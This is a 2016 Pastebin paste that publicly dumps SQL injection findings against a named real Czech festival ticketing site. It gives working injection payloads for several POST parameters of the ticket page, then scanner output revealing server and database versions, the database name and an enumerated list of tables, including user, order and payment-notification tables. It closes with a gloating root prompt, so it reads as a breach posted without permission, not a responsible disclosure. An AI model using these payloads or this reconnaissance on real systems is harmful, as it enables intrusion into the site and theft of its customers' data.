API tools faq
paste
Advertisement
Guest User

festivaltrutnov.cz - SQLi

a guest
May 11th, 2016
211
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.98 KB | None | 0 0
raw download clone embed print report
  1. === SQL Injection
  2.  
  3. Severity : Critical
  4. Vulnerable URL : http://festivaltrutnov.cz/vstupenky
  5. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  6. Parameter Name: akcecenikCZK
  7. Parameter Type: Post
  8. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  9.  
  10. === Boolean Based SQL Injection
  11.  
  12. Severity : Critical
  13. Vulnerable URL : http://festivaltrutnov.cz/vstupenky
  14. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  15. Parameter Name: akcecenikCZK
  16. Parameter Type: Post
  17. Attack Pattern: -1 OR 17-7=10
  18.  
  19. === [High Possibility] SQL Injection
  20.  
  21. Severity : Critical
  22. Vulnerable URL : http://festivaltrutnov.cz/vstupenky
  23. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  24. Parameter Name: akcecenikCZK
  25. Parameter Type: Post
  26. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  27.  
  28. Severity : Critical
  29. Confirmation : Confirmed
  30. Vulnerable URL : http://festivaltrutnov.cz/vstupenky
  31. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  32. Parameter Name: cp
  33. Parameter Type: Post
  34. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  35.  
  36. Severity : Critical
  37. Vulnerable URL : http://festivaltrutnov.cz/vstupenky
  38. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  39. Parameter Name: email
  40. Parameter Type: Post
  41. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  42.  
  43. Severity : Critical
  44. Vulnerable URL : http://festivaltrutnov.cz/vstupenky
  45. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  46. Parameter Name: jmeno
  47. Parameter Type: Post
  48. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  49.  
  50. Severity : Critical
  51. Vulnerable URL : http://festivaltrutnov.cz/vstupenky
  52. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  53. Parameter Name: mesto
  54. Parameter Type: Post
  55. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  56.  
  57.  
  58. Analyzing http://festivaltrutnov.cz/vstupenky with 10 input parameter(s)
  59. Test parameter: stat
  60. Host IP: 127.0.0.1 (Proxy IP)
  61. Web Server: Apache/2.2.22 (Debian)
  62. Powered-by: PHP/5.4.45-0+deb7u2
  63. DB Server: MySQL
  64.  
  65. Current DB: festivaltrutnovcz
  66.  
  67. Table found: aktuality
  68. Table found: aktualityen
  69. Table found: bands
  70. Table found: bands11
  71. Table found: cenikvstupenek
  72. Table found: cenikvstupenek_2014
  73. Table found: cenikvstupenek_2015
  74. Table found: cenikvstupenek_2016
  75. Table found: forum
  76. Table found: fotky
  77. Table found: fotogalerie
  78. Table found: galerie
  79. Table found: galerie_nadpisy
  80. Table found: gopay_notifikace
  81. Table found: kategorie
  82. Table found: mayal2014
  83. Table found: menu
  84. Table found: menu10
  85. Table found: menu2010
  86. Table found: objednavka
  87. Table found: objednavka_polozky
  88. Table found: objednavky
  89. Table found: obrazky
  90. Table found: obsah
  91. Table found: obsah2010
  92. Table found: portal
  93. Table found: press_web
  94. Table found: refererstat
  95. Table found: sez_vstupenky
  96. Table found: uzivatele
  97. Table found: video
  98. Table found: viewstat
  99. Table found: vstupenky
  100. Table found: vstupenky10
  101. Table found: vstupenky2012
  102. Table found: vstupenky2013
  103. Table found: vstupenky2014
  104. Table found: vstupenky2015
  105. Table found: vstupenky2016
  106. Table found: wp11_newsletter_users
  107. Table found: zbozi
  108. Table found: zbozi_atributy
  109. Table found: zbozi_atributy_hodnoty
  110. Table found: zbozi_sklad
  111.  
  112. root@subgraph:~# :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!